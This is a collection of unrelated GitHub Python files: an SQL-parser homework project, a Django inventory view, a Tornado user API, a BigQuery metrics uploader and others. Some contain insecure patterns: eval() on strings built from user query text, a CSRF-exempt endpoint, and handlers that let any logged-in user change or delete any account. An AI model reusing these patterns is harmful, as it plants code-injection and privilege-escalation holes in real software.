context.update(self.get_context_with_status())\n return {\n 'name': self.display_name,\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'vnitpro.project',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'nodestroy': True,\n 'context': str(context)\n }\n\n @api.one\n @api.depends('status')\n def _compute_by_status(self):\n if self.status:\n time = self.get_today()\n self.name = dict(self._fields['status'].selection).get(self.status)\n domains = []\n # (1, 'Project Draft'), (2, 'Project Confirmed'), (3, 'In Process'), (4, 'Finish'), (5, 'On Hold'), (6, 'Cancel')\n if self.status == 1:\n domains = [('status', '=', 1)]\n elif self.status == 2:\n domains = ['&', '|', '|', '|', ('status', '=', 3), ('status', '=', 4),\n ('status', '=', 5), ('status', '=', 6), ('status', '=', 2)]\n elif self.status == 3:\n domains = [('status', '=', 
3)]\n            elif self.status == 4:\n                domains = [('status', '=', 4)]\n            elif self.status == 5:\n                domains = [('status', '=', 5)]\n            elif self.status == 6:\n                domains = [('status', '=', 6)]\n            self.count_expire_today = len(self.env['vnitpro.project'].search(\n                domains + [('expire_date', '=', time)]))\n            self.count_unexpired = len(self.env['vnitpro.project'].search(\n                domains + [('expire_date', '>', time)]))\n            self.count_out_of_date = len(self.env['vnitpro.project'].search(\n                domains + [('expire_date', '<', time)]))\n            self.count_record = self.count_expire_today + self.count_unexpired + self.count_out_of_date\n","repo_name":"tu2305/VNITPro_erp","sub_path":"vnitpro_project/models/project_dashboard.py","file_name":"project_dashboard.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"18121104695","text":"# Ex -> Using the data from hn_submissions.py, make a bar chart showing the most active discussions currently happening on Hacker News. The height of each bar should correspond to the number of comments each submission has. The label for each bar should include the submission’s title and act as a link to the discussion page for that submission. If you get a KeyError when creating a chart, use a try-except block to skip over the promotional posts.\n\nimport requests\nfrom operator import itemgetter\nimport json\nimport plotly.express as px\n\n# Make API call and store the response\nurl = \"https://hacker-news.firebaseio.com/v0/topstories.json\"\nr = requests.get(url)\nprint(f\"Status code: {r.status_code}\")\n\n# Explore Data\nsubmission_ids = r.json()\nsubmission_dicts = []\nfor submission_id in submission_ids[:10]:\n    # Make a new API call for each submission\n    url = f\"https://hacker-news.firebaseio.com/v0/item/{submission_id}.json\"\n    r = requests.get(url)\n    print(f\"id : {submission_id}\\tstatus: {r.status_code}\")\n    response_dict = r.json()\n\n    # Build a dictionary for each article\n    submission_dict = {\n        'title': response_dict['title'],\n        'hn_link': f\"https://news.ycombinator.com/item?id={submission_id}\",\n        'comments': response_dict['descendants']\n    }\n\n    submission_dicts.append(submission_dict)\n\nsubmission_dicts = sorted(submission_dicts, key=itemgetter('comments'),\n                          reverse=True)\n\nprint(submission_dicts)\ntitles, hn_links, comments = [], [], []\nfor submission_dict in submission_dicts:\n    titles.append(submission_dict['title'])\n    link = f\"<a href='{submission_dict['hn_link']}'>{submission_dict['title']}</a>\"\n    hn_links.append(link)\n    comments.append(submission_dict['comments'])\n\ntitle = \"Most Commented Articles on Hacker News\"\nlabels = {'x': 'Submission', 'y': 'Comments'}\nfig = px.bar(x=hn_links, y=comments, title=title,\n             labels=labels, hover_name=titles)\n\nfig.update_layout(title_font_size=28, xaxis_title_font_size=20,\n                  yaxis_title_font_size=20)\nfig.update_traces(marker_color='SteelBlue', marker_opacity=0.6)\nfig.show()\n","repo_name":"mcms95/Data-visualization","sub_path":"Chapter 17 - API's/17-2. 
Active Discussions.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37089758058","text":"from django.views.decorators.csrf import csrf_exempt\nfrom abc import ABC, abstractmethod\nfrom django.http.response import JsonResponse\nfrom PyCommerce.models import inventoryDetails\nfrom api.update.invBalance import update_inv_balance\nfrom api.update.checkBalance import check_inv_balance\nimport json\n\n\nclass IUpdateInventoryDetail(ABC):\n @abstractmethod\n def update_inv_detail():\n pass\n\n\nclass UpdateInvDetail():\n @csrf_exempt\n def update_inv_detail(self, request, id):\n response = False\n if request.method == \"POST\":\n response = True\n data = json.loads(request.body)\n if data['TransType_id'] == 2:\n check_balance = check_inv_balance(\n data['ProductId_id'], data['StoreId_id'], data['Quantity'], id)\n if check_balance == True:\n inventoryDetails.objects.filter(id=id).update(**data)\n update_inv_balance(data, id)\n else:\n response = False\n else:\n inventoryDetails.objects.filter(id=id).update(**data)\n update_inv_balance(data)\n return JsonResponse(response, safe=False)\n\n\nupdate_inv_detail = UpdateInvDetail().update_inv_detail\n","repo_name":"abdullah-ezzat/pycommerce","sub_path":"api/update/updateInvDetail.py","file_name":"updateInvDetail.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28811971606","text":"'''\nCreated On: Aug 29, 2019\nAuthor: Deepti\n\nBuild an SQL parser through CLI\n'''\n\n\n# TO DO : Check errors\n\nimport re\nimport sys\nimport csv\n\n\n# First things first : read metadata from metadata.txt\nMETA = './files/metadata.txt'\ntables_list = {} # Since multiple tables\ntables_needed = {}\n\nAGG = ['distinct', 'max', 'sum', 'avg', 'min']\n\ndef read_metadata(file):\n '''\n Get structure of multiple tables\n '''\n begin = 0\n\n table_name = \"\"\n try:\n struct_file = open(file, 'r')\n except IOError:\n sys.stderr.write(\"Error: No meta-structure found.\\n\")\n quit(-1)\n\n for line in struct_file:\n line = line.strip() # Remove white spaces\n if line == '<begin_table>':\n begin = 1\n continue\n if begin == 1:\n table_name = line\n tables_list[table_name] = []\n begin = 0\n elif line != \"<end_table>\":\n tables_list[table_name].append(line)\n\ndef get_datacolumns(table_name):\n '''\n Read data in table ka file\n '''\n file = './files/' + table_name + '.csv'\n data = []\n try:\n src = open(file, \"rt\")\n except IOError:\n sys.stderr.write(\"Error: No corresponding .csv file found.\\n\")\n quit(-1)\n\n info = csv.reader(src)\n for row in info:\n data.append(row)\n src.close()\n return data\n\ndef parse_query(line):\n '''\n Parse query\n '''\n columns = []\n functions = []\n distincts = []\n dist_pair = []\n\n tables_inquery = []\n\n words = (re.sub(' +', ' ', line)).strip()\n\n # Check for table name:\n if 'from' not in words.split():\n sys.stderr.write(\"Error: No table name mentioned in query.\\n\")\n quit(-1)\n words = words.split('from')\n stripped = [(re.sub(' +', ' ', word)).strip() for word in words]\n clauses = [(re.sub(' +', ' ', word)).strip() for word in stripped[1].split(\"where\")]\n tables_inquery = [(re.sub(' +', ' ', word)).strip() for word in clauses[0].split(\",\")]\n for table in tables_inquery:\n if table not in tables_list:\n sys.stderr.write(\"Error: Table name is not valid.\\n\")\n quit(-1)\n tables_needed[table] = 
get_datacolumns(table)\n\n needed = [(re.sub(' +', ' ', word)).strip() for word in stripped[0][7:].split(',')]\n\n for condition in needed:\n if \"distinct\" in condition.lower():\n dist_pair.append(['distinct', condition.split('distinct')[1].strip(), \\\n needed[(needed.index(condition))+1]])\n continue\n if \"distinct\" in needed[(needed.index(condition))-1].lower():\n continue\n\n part_of_agg = False\n for func in AGG:\n if func + '(' in condition.lower():\n if ')' not in condition:\n sys.stderr.write(\"Error: Closing Bracket not found in query.\\n\")\n quit(-1)\n splitter = func + '('\n part_of_agg = True\n if func == 'distinct':\n distincts.append(condition.strip(')').split(splitter)[1])\n else:\n functions.append([func, condition.strip(')').split(splitter)[1]])\n break\n if not part_of_agg:\n if condition != '':\n columns.append(condition.strip('()'))\n\n # print(columns, functions, distincts, dist_pair)\n # Now that we got all that we needed\n if len(clauses) > 1:\n execute(columns, functions, distincts, dist_pair, tables_inquery, clauses[1])\n else:\n execute(columns, functions, distincts, dist_pair, tables_inquery)\n\ndef execute(columns, functions, distincts, dist_pair, tables_inquery, clauses=[]):\n '''\n Execute depending on parameters passed into this function\n '''\n if len(dist_pair) != 0:\n distinct_pair_process(dist_pair, tables_inquery)\n elif len(functions) > 0:\n process_func(clauses, columns, tables_inquery, functions) # since only single column\n elif len(tables_inquery) == 1:\n normal_where(clauses, columns, tables_inquery[0])\n elif len(tables_inquery) > 1 and len(clauses) == 0:\n join(columns, tables_inquery)\n elif len(tables_inquery) > 1 and len(clauses) > 0:\n join_where(clauses, columns, tables_inquery)\n\ndef process_func(clauses, columns, tables, functions):\n '''\n Process Min, Max, Avg, Sum\n '''\n for abc in functions:\n columns = []\n func = abc[0]\n columns.append(abc[1])\n table, column = '', ''\n if '.' 
in columns[0]:\n table, column = columns[0].split('.')\n else:\n count = 0\n for tab in tables:\n if columns[0] in tables_list[tab]:\n table = tab\n column = columns[0]\n count += 1\n if count > 1 or count == 0:\n sys.stderr.write(\"Error: Column name not defined correctly.\\n\")\n quit(-1)\n\n print(bring_forth(table, columns))\n print(\"-\"*len(bring_forth(table, columns)))\n\n if(len(clauses) == 1):\n clausey = [(re.sub(' +', ' ', i)).strip() for i in clauses.split()]\n\n if(len(clauses) == 1) and columns[0] in clausey:\n data = []\n for row in tables_needed[table]:\n evaluator = solve(row, table, clauses)\n if eval(evaluator):\n for column in columns:\n data.append(float(row[tables_list[table].index(column)]))\n else:\n data = []\n for row in tables_needed[table]:\n for column in columns:\n data.append(float(row[tables_list[table].index(column)]))\n \n result = 0\n if func.lower() == 'avg':\n result += sum(data) / len(data)\n elif func.lower() == 'sum':\n result += sum(data)\n elif func.lower() == 'max':\n result = max(data)\n elif func.lower() == 'min':\n result = min(data)\n\n print(result)\n\ndef distinct_pair_process(dist_pair, tables):\n columns_in_table = {}\n tables_found = []\n\n for column in [dist_pair[0][1], dist_pair[0][2]]:\n table, column = search_column(column, tables)\n if table not in columns_in_table.keys():\n columns_in_table[table] = []\n tables_found.append(table)\n columns_in_table[table].append(column)\n # print(tables_found, columns_in_table)\n\n if len(tables_found) > 1:\n data_injoin = []\n for item1 in tables_needed[tables_found[0]]:\n for item2 in tables_needed[tables_found[1]]:\n data_injoin.append(item1 + item2)\n display_output(tables_found, columns_in_table, data_injoin, join=True, distinct=True)\n else:\n table = tables_found[0]\n columns = columns_in_table[table]\n print(bring_forth(table, columns))\n print(\"-\"*len(bring_forth(table, columns)))\n result = []\n for row in tables_needed[table]:\n ans = ''\n for column in columns:\n ans += row[tables_list[table].index(column)] + '\\t|'\n if ans.strip('\\t|') not in result:\n result.append(ans.strip('\\t|'))\n for row in result:\n print(row)\n\n\ndef normal_where(clauses, columns, table):\n if len(columns) == 1 and columns[0] == '*' and len(clauses) == 0:\n columns = tables_list[table]\n print(bring_forth(table, columns))\n print(\"-\"*len(bring_forth(table, columns)))\n for data in tables_needed[table]:\n ans = ''\n for column in columns:\n ans += data[tables_list[table].index(column)] + '\\t|'\n print(ans.strip('\\t|'))\n \n elif len(clauses) == 0:\n print(bring_forth(table, columns))\n print(\"-\"*len(bring_forth(table, columns)))\n for row in tables_needed[table]:\n ans = ''\n for column in columns:\n ans += row[tables_list[table].index(column)] + '\\t|'\n print(ans.strip('\\t|'))\n \n elif len(clauses) >= 1:\n if len(columns) == 1 and columns[0] == '*':\n columns = tables_list[table]\n print(bring_forth(table, columns))\n print(\"-\"*len(bring_forth(table, columns)))\n for row in tables_needed[table]:\n evaluator = solve(row, table, clauses)\n ans = ''\n if eval(evaluator):\n for column in columns:\n ans += row[tables_list[table].index(column)] + '\\t|'\n print(ans.strip('\\t|'))\n\ndef join_where(clauses, columns, tables):\n operators = ['>=', '<=', '>', '<', '=']\n now = ''\n og = clauses\n if 'and' in clauses:\n clauses = clauses.split('and')\n now = 'and'\n elif 'or' in clauses:\n clauses = clauses.split('or')\n now = 'or'\n else:\n clauses = [clauses]\n if len(clauses) > 2:\n 
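# guard: the parser handles at most two where-conditions joined by a single 'and'/'or'; longer chains are rejected\n        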
sys.stderr.write(\"Error: Only two clauses joined by ONE or/and is viable.\\n\")\n quit(-1)\n # print(clauses)\n \n condition1 = clauses[0]\n for operator in operators:\n if operator in condition1:\n condition1 = condition1.split(operator)\n\n if len(condition1) == 2 and '.' in condition1[1]:\n condition_join(condition1, columns, tables)\n else:\n join_conditionally(now, clauses, columns, tables)\n\ndef condition_join(clauses, columns, tables):\n '''\n With a condition\n '''\n if len(clauses) > 2:\n sys.stderr.write(\"Error: Join condition invalid\\n\")\n quit(-1)\n \n conditional_columns = [(re.sub(' +', ' ', word)).strip() for word in clauses]\n \n columns_cond = {}\n tables_found = []\n for column in conditional_columns:\n table, column = search_column(column, tables)\n if table not in columns_cond.keys():\n columns_cond[table] = []\n tables_found.append(table)\n columns_cond[table].append(column)\n keep = []\n\n column1 = tables_list[tables[0]].index(columns_cond[tables[0]][0])\n column2 = tables_list[tables[1]].index(columns_cond[tables[1]][0])\n\n for data in tables_needed[tables[0]]:\n for row in tables_needed[tables[1]]:\n evaluator = data[column1] + '==' + row[column2]\n if eval(evaluator):\n keep.append(data + row)\n \n final_columns = {}\n final_tables = []\n\n flag = 0\n if len(columns) == 1 and columns[0] == '*':\n for table in tables:\n final_columns[table] = []\n for column in tables_list[table]:\n if column in columns_cond[table]:\n if flag == 0:\n final_columns[table].append(column)\n flag = 1\n continue\n else:\n final_columns[table].append(column)\n final_tables = tables\n else:\n for column in columns:\n table, column = search_column(column, tables)\n if table not in final_columns.keys():\n final_columns[table] = []\n final_tables.append(table)\n final_columns[table].append(column)\n\n display_output(final_tables, final_columns, keep, join=True)\n\n\ndef join_conditionally(now, clauses, columns, tables):\n '''\n Without a condition\n '''\n data = join_data(clauses, columns, tables)\n columns_in_table = {}\n tables_found = []\n if columns[0] == '*':\n if len(columns) != 1:\n sys.stderr.write(\"Error: Select function invalid\\n\")\n quit(-1)\n for table in tables:\n columns_in_table[table] = []\n for column in tables_list[table]:\n columns_in_table[table].append(column)\n tables_found = tables\n else:\n for column in columns:\n table, column = search_column(column, tables)\n if table not in columns_in_table.keys():\n tables_found.append(table)\n columns_in_table[table] = []\n columns_in_table[table].append(column)\n\n final_data = []\n if now == 'and':\n for obja in data[tables[0]]:\n for objb in data[tables[1]]:\n final_data.append(obja + objb)\n elif now == 'or':\n for obja in data[tables[0]]:\n for objb in tables_needed[tables[1]]:\n if objb not in data[tables[1]]:\n final_data.append(obja + objb)\n for item1 in data[tables[1]]:\n for item2 in tables_needed[tables[0]]:\n if item2 not in data[tables[0]]:\n final_data.append(item2 + item1)\n for obja in data[tables[0]]:\n for objb in data[tables[1]]:\n final_data.append(obja + objb)\n else:\n table1 = list(data.keys())[0]\n flag = False\n table2 = tables_found[1]\n if table1 == tables_found[1]:\n table2 = tables_found[0]\n flag = True\n\n for obja in data[table1]:\n for objb in tables_needed[table2]:\n if flag:\n final_data.append(objb + obja)\n else:\n final_data.append(obja + objb)\n display_output(tables_found, columns_in_table, final_data, join=True)\n\ndef join_data(clauses, columns, tables):\n operators = 
['<=','>=','<', '>', '=']\n needed_data = {}\n for query in clauses:\n needed = []\n for operator in operators:\n if operator in query:\n needed = query.split(operator)\n break\n needed = [(re.sub(' +', ' ', word)).strip() for word in needed]\n table, column = search_column(needed[0], tables)\n needed_data[table] = []\n query = query.replace(needed[0], ' ' + column + ' ')\n for data in tables_needed[table]:\n evaluator = solve(data, table, query)\n try:\n if eval(evaluator):\n needed_data[table].append(data)\n # print(needed_data)\n except NameError:\n sys.stderr.write(\"Error: Invalid condition\\n\")\n quit(-1)\n return needed_data\n\ndef join(columns, tables):\n '''\n Display columns from two or more tables\n '''\n columns_in_table = {}\n tables_found = []\n if len(columns) == 1 and columns[0] == '*':\n for table in tables:\n columns_in_table[table] = []\n for column in tables_list[table]:\n columns_in_table[table].append(column)\n tables_found = tables\n else:\n for column in columns:\n table, column = search_column(column, tables)\n if table not in columns_in_table.keys():\n columns_in_table[table] = []\n tables_found.append(table)\n columns_in_table[table].append(column)\n \n data_injoin = []\n\n # print(tables_found, columns)\n if len(tables_found) == 2:\n for item1 in tables_needed[tables_found[0]]:\n for item2 in tables_needed[tables_found[1]]:\n data_injoin.append(item1 + item2)\n display_output(tables_found, columns_in_table, data_injoin, join=True)\n else:\n display_output(tables_found, columns_in_table)\n \n\ndef bring_forth(table, columns):\n string = ''\n for column in columns:\n if string != '':\n string += '|'\n string += table + '.' + column\n return string\n\ndef solve(row, table, clauses):\n evaluator = ''\n clauses = [(re.sub(' +', ' ', i)).strip() for i in clauses.split()]\n for condition in clauses:\n if condition == '=':\n evaluator += condition * 2\n elif condition.lower() == 'and' or condition.lower() == 'or':\n evaluator += ' ' + condition.lower() + ' '\n elif '.' in condition:\n table_found, column = search_column(condition, [table])\n evaluator += row[tables_list[table_found].index(column)]\n elif condition in tables_list[table]:\n evaluator += row[tables_list[table].index(condition)]\n else:\n evaluator += condition\n return evaluator\n\n\ndef search_column(column, tables):\n table_found = ''\n if '.' 
in column:\n table, column = column.split('.')\n table = (re.sub(' +', ' ', table)).strip()\n column = (re.sub(' +', ' ', column)).strip()\n if table not in tables:\n sys.stderr.write(\"Error: No such table exists.\\n\")\n quit(-1)\n return table, column\n count = 0\n for table in tables:\n if column in tables_list[table]:\n count += 1\n table_found = table\n if count > 1 or count == 0:\n sys.stderr.write(\"Error: Column name not defined correctly.\\n\")\n quit(-1)\n return table_found, column\n\ndef display_output(tables, columns, data = tables_needed, join=False, distinct=False):\n if distinct and join:\n header1 = bring_forth(tables[0], columns[tables[0]])\n header2 = bring_forth(tables[1], columns[tables[1]])\n print(header1 + '|' + header2)\n print(\"-\"*len(header1 + '|' + header2))\n result = []\n for item in data:\n ans = ''\n for column in columns[tables[0]]:\n ans += item[tables_list[tables[0]].index(column)] + '\\t|'\n for column in columns[tables[1]]:\n ans += item[tables_list[tables[1]].index(column) +\n len(tables_list[tables[0]])] + '\\t|'\n if ans.strip('\\t|') not in result:\n result.append(ans.strip('\\t|'))\n for row in result:\n print(row)\n elif len(tables) == 1 and join:\n header1 = bring_forth(tables[0], columns[tables[0]])\n print(header1)\n print(\"-\"*len(header1))\n for item in data:\n ans = ''\n for column in columns[tables[0]]:\n ans += item[tables_list[tables[0]].index(column)] + '\\t|'\n print(ans.strip('\\t|'))\n \n elif join:\n header1 = bring_forth(tables[0], columns[tables[0]])\n header2 = bring_forth(tables[1], columns[tables[1]])\n print(header1 + '|' + header2)\n print(\"-\"*len(header1 + '|' + header2))\n for item in data:\n ans = ''\n for column in columns[tables[0]]:\n ans += item[tables_list[tables[0]].index(column)] + '\\t|'\n for column in columns[tables[1]]:\n ans += item[tables_list[tables[1]].index(column) +\n len(tables_list[tables[0]])] + '\\t|'\n print(ans.strip('\\t|'))\n else:\n for table in tables:\n print(bring_forth(table, columns[table]))\n print(\"-\"*len(bring_forth(table, columns[table])))\n for data in data[table]:\n ans = ''\n for column in columns[table]:\n ans += data[tables_list[table].index(column)] + '\\t|'\n print(ans.strip('\\t|'))\n print(\"\")\n\nread_metadata(META)\nquery = sys.argv[1]\nparse_query(query)\n ","repo_name":"deeptimahesh/TinySQL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39974573322","text":"import json\nimport os\nfrom pathlib import Path\nfrom google.cloud import bigquery\nfrom datetime import datetime\n\n\ncredential_path = Path.cwd() / 'node-bigquery-privkey.json'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = str(credential_path)\nclient = bigquery.Client()\nprevious_ts_format = \"%d/%m/%Y %H:%M:%S.%f\"\nbq_format = \"%Y-%m-%d %H:%M:%S.%f\"\n\n\ndef read_from_bigquery():\n query = \"\"\"\n select\n execution_log,\n metrics\n from\n `node-bigquery-367604.zeuz_node.reports_telus_nov28`\n where\n STARTS_WITH(run_id, 'Mon-Nov-28');\n \"\"\"\n\n queryJob = client.query(query)\n data = queryJob.result()\n result = []\n for d in data:\n result.append((\n json.loads(d.execution_log),\n json.loads(d.metrics),\n ))\n return result\n\n\ndef convert_ts(prev_ts):\n return datetime.strftime(\n datetime.strptime(prev_ts, previous_ts_format),\n # prev_ts,\n bq_format,\n )\n\n\ndef send_to_bigquery(execution_log, metrics):\n client = bigquery.Client()\n 
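# destination tables in project.dataset.table form; rows are written via the BigQuery streaming insert API (insert_rows_json)\n    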
action_table_id = \"node-bigquery-367604.zeuz_node.zeuz_metrics_node_actions\"\n steps_table_id = \"node-bigquery-367604.zeuz_node.zeuz_metrics_node_steps\"\n\n run_id = execution_log[\"run_id\"]\n tc_id = execution_log[\"test_cases\"][0][\"testcase_no\"]\n\n steps = metrics[\"node\"][\"steps\"]\n actions = metrics[\"node\"][\"actions\"]\n try:\n browser_perf = metrics[\"browser_performance\"][\"default\"]\n except:\n browser_perf = list()\n\n # A dict of step id to step name\n step_names = {}\n for step in steps:\n if \"id\" not in step:\n return\n step_names[step[\"id\"]] = step[\"name\"]\n\n\n def send_actions_metrics():\n for action in actions:\n action[\"run_id\"] = run_id\n action[\"tc_id\"] = tc_id\n if \"step_id\" not in action:\n continue\n action[\"step_name\"] = step_names[action[\"step_id\"]]\n action[\"time_stamp\"] = convert_ts(action[\"timestamp\"])\n del action[\"timestamp\"]\n\n rows_to_insert = actions\n errors = client.insert_rows_json(action_table_id, rows_to_insert)\n if len(errors) == 0:\n print(\"Sent action metrics report to BigQuery\")\n else:\n print(f\"Encountered errors while inserting rows: {errors}\")\n\n\n def send_steps_metrics():\n for step in steps:\n step[\"run_id\"] = run_id\n step[\"tc_id\"] = tc_id\n step[\"step_id\"] = step[\"id\"]\n del step[\"id\"]\n step[\"step_name\"] = step[\"name\"]\n del step[\"name\"]\n step[\"step_sequence\"] = step[\"sequence\"]\n del step[\"sequence\"]\n step[\"time_stamp\"] = convert_ts(datetime.today())\n if \"actions\" in step:\n del step[\"actions\"]\n\n rows_to_insert = steps\n errors = client.insert_rows_json(steps_table_id, rows_to_insert)\n if len(errors) == 0:\n print(\"Sent step metrics report to BigQuery\")\n else:\n print(f\"Encountered errors while inserting rows: {errors}\")\n\n\n def send_browser_perf_metrics():\n rows_to_insert = json.dumps(browser_perf)\n\n\n send_actions_metrics()\n # send_steps_metrics()\n send_browser_perf_metrics()\n\n\ndef main():\n\n data = read_from_bigquery()\n for execution_log, metrics in data:\n send_to_bigquery(execution_log, metrics)\n\n # with open(\"sample_metrics.json\", \"r\") as f:\n # data = json.load(f)\n\n # A dict of step id to step name\n # step_names = {}\n # for step in steps:\n # step_names[step[\"id\"]] = step[\"name\"]\n # data = convert(data)\n\nmain()\n","repo_name":"AutomationSolutionz/Zeuz_Python_Node","sub_path":"Framework/metrics/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"7777355296","text":"# coding=utf-8\n\nimport logging\nfrom .base import BaseHandler\nfrom models.user import User\nfrom utils.check import require_login\n\n\nclass UserHandler(BaseHandler):\n \"\"\"获取用户信息\"\"\"\n def is_shop(self):\n return True if self.request.uri.startswith(\"/shop/\") else False\n\n def get(self, uid):\n \"\"\"\n @apiDescription 获取用户信息\n @api {get} /user/([0-9]+)/? 获取用户信息\n @api {get} /shop/([0-9]+)/? 
获取商家信息\n @apiGroup user\n @apiGroup shop\n\n @apiParam {Number} uid 用户uid\n\n @apiPermission user\n\n @apiSuccess {Number} uid 用户uid\n @apiSuccess {String} avatar 头像\n @apiSuccess {String} name 用户名\n @apiSuccess {Number} speed 配送时间,仅商家时出现\n @apiSuccess {Number} sales_count 销量,仅商家出现\n @apiSuccess {Number} lowest_money 起送价,仅商家出现\n @apiSuccess {Boolean} invoice 是否开具发票,仅商家出现\n @apiSuccess {Boolean} free_send 是否免费配送,如果非免费配送,统一收配送费1元\n @apiSuccess {Integer} distance 距离,仅商家出现\n @apiSuccess {Boolean} new_seller 是否为新商家,仅商家出现\n @apiSuccess {Number} level 用户级别,仅获取自己信息时出现\n @apiSuccess {String} register_at 注册时间,仅获取自己信息时出现\n @apiSuccess {String} phone 手机号,仅获取自己信息时出现\n @apiSuccess {Array} address 配送地址,仅获取自己信息时出现\n @apiSuccessExample {json} Success Response:\n {\n \"uid\": 1,\n \"avatar\": \"http://xxxx.com/avatar.png\",\n \"name\": \"001\",\n // 以下为用户获取自己信息时才会出现\n \"level\": 0,\n \"register_at\": \"2016-03-27 00:00:00\",\n \"phone\": \"99999\",\n \"address\": []\n }\n\n @apiError UserNotExists 用户不存在\n \"\"\"\n uid = int(uid)\n # hack: 因为改url涉及面太广,所以通过查看self.require_shop 来判定吧-。-\n shop = self.is_shop()\n\n user = User.get_instance_by_id(self.orm_session, uid)\n if user:\n result = self._get_user_info(user, shop)\n self.write(result)\n else:\n self.write(dict(\n status=1,\n msg=\"no such user\",\n ))\n\n @require_login\n def put(self, uid):\n \"\"\"\n @apiDescription 修改用户信息\n @api {put} /user/([0-9]+)/? 修改用户信息\n @api {put} /shop/([0-9]+)/? 修改商家信息\n @apiGroup user\n @apiGroup shop\n\n @apiParam {Number} [uid] uid\n @apiParam {Number} [level] 级别\n @apiParam {String} [passwd] 密码\n @apiParam {String} [phone] 手机号\n @apiParam {String} [name] 名字\n @apiParam {String} [address] 地址\n\n @apiPermission user\n\n @apiError UserNotExists 用户不存在\n \"\"\"\n to_change = dict(\n avatar=self.get_argument(\"avatar\", None),\n level=int(self.get_argument(\"level\", 0)),\n passwd=self.get_argument(\"passwd\", None),\n phone=self.get_argument(\"phone\", None),\n name=self.get_argument(\"name\", None),\n address=self.get_argument(\"addresses\", None)\n )\n\n user = User.get_instance_by_id(self.orm_session, uid)\n if not user:\n self.write(dict(\n status=1,\n msg=\"user does not exists\"\n ))\n return\n\n for key, value in to_change.items():\n if value:\n setattr(user, key, value)\n self.orm_session.commit()\n self.write({})\n\n @require_login\n def delete(self, uid):\n \"\"\"\n @apiDescription 删除用户信息\n @api {delete} /user/([0-9]+)/? 删除用户信息\n @api {delete} /shop/([0-9]+)/? 
删除商家信息\n @apiGroup user\n @apiGroup shop\n\n @apiPermission user\n \"\"\"\n User.delete(self.orm_session, uid)\n self.write({})\n\n\nclass RegisterHandler(BaseHandler):\n \"\"\"\n @apiDescription 创建用户\n @api {post} /user/new 创建新用户\n @apiGroup user\n\n @apiParam {String} phone 手机号\n @apiParam {String} passwd 密码\n @apiParam {String} [name] 用户名,可缺省,默认为电话号码\n\n @apiPermission user\n\n @apiSuccess {Number} uid 用户uid,全局唯一\n\n @apiError UserExists 手机号已存在\n @apiError UserLevelError 所申请的用户级别错误\n \"\"\"\n def post(self):\n level = int(self.get_argument(\"level\", 0))\n if not 0 <= level < 2:\n self.write(dict(\n status=1,\n msg=\"illegal\"\n ))\n return\n\n phone = self.get_argument(\"phone\")\n passwd = self.get_argument(\"passwd\")\n name = self.get_argument(\"name\", phone)\n\n try:\n user = User(\n level=level,\n phone=phone,\n passwd=passwd,\n name=name,\n )\n self.orm_session.add(user)\n self.orm_session.commit()\n self.orm_session.refresh(user)\n\n self.write(dict(\n uid=user.id,\n ))\n except Exception as e:\n import traceback\n traceback.print_stack()\n logging.error(e)\n self.write(dict(\n status=1,\n msg=\"failed to register\",\n ))\n","repo_name":"jiajunhuang/graduation","sub_path":"controllers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14895609082","text":"# core\nimport os\nfrom werkzeug.utils import secure_filename\nimport base64\nfrom io import BytesIO\n\n# for croping face & create clf\nfrom utils.helpers import preprocess_image\nimport face_recognition\nimport pickle\nfrom PIL import Image\nimport shutil\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, precision_score, recall_score, accuracy_score, classification_report\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport imgaug.augmenters as iaa\nfrom mtcnn import MTCNN\n\n# for detect face\nimport cv2\n\n# import utils\nfrom utils.helpers import KNNClassifier\nfrom utils.helpers import generate_response\n\n# ============================\n# Check Is Employe Have Folder\n# ============================\ndef check_employee_folder(request):\n employee_id = request.args.get('employeeid')\n\n folder_path = os.path.join('assets', 'photo_frame', f\"employee_{employee_id}\") # Path lengkap ke folder employee\n \n if os.path.exists(folder_path):\n return generate_response(message=f\"Folder for employee {employee_id} exists.\",status=200)\n else:\n return generate_response(message=f\"Folder for employee {employee_id} does not exists.\",status=404)\n\n# ============================================\n# Re Create .clf if new employee create folder\n# ============================================\ndef create_model_file(request):\n \n employee_id = request.form.get('employeeid')\n file = request.files.get('photo')\n\n folder_path = os.path.join('assets', 'photo_frame', f\"employee_{employee_id}\") # Path lengkap ke folder employee\n\n # Membuat folder jika belum ada\n if os.path.isfile(\"assets/model/trained_knn_model.clf\"):\n os.remove(\"assets/model/trained_knn_model.clf\")\n os.remove(\"assets/model/confusion_Matrix.png\")\n \n os.makedirs(folder_path, exist_ok=True)\n\n # Mengubah file menjadi objek Image\n image = Image.open(file)\n image_name = os.path.splitext(file.filename)[0]\n\n num_images = 30\n\n # Buat direktori output jika belum ada\n output_dir = folder_path\n os.makedirs(output_dir, exist_ok=True)\n\n seq = 
